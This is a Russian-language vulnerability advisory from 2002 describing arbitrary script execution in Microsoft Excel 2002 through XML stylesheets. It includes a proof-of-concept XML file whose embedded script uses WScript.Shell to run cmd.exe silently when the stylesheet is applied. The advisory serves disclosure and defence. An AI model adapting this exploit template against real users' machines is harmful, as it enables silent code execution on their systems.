Выполнение произвольного кода в Microsoft Excel 2002 XML Stylesheet

Дата публикации:	27.05.2002
Всего просмотров:	1225
Опасность:
Наличие исправления:
Количество уязвимостей:	1
CVE ID:	Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:
Описание:	В Microsoft Excel 2002 можно включать XML таблицы стилей с XML документами. При загрузке такого документа, пользователю предлагают выбор – загружать таблицу стилей или нет. Если XML таблица стилей содержит сценарий (Javascript и VBscript модули), и когда пользователь выбирает применять таблицу стилей при просмотре .xls файла, сценарий выполнится, при этом пользователь не будет уведомлен об этом. Уязвимость обнаружена в Microsoft Excel 2002 Эксплоит: ------xls_sux.xls----- <?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="#?m$ux" ?> <xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl"> <xsl:script> <![CDATA[ x=new ActiveXObject("WScript.Shell"); x.Run("%systemroot%\\SYSTEM32\\CMD.EXE /C DIR C:\\ /a /p /s"); ]]> </xsl:script> <msux> msux written by georgi guninski </msux> </xsl:stylesheet> ----------------------
Ссылки:	Excel XP xml stylesheet problems

Выполнение произвольного кода в Microsoft Excel 2002 XML Stylesheet

Подпишитесь на email рассылку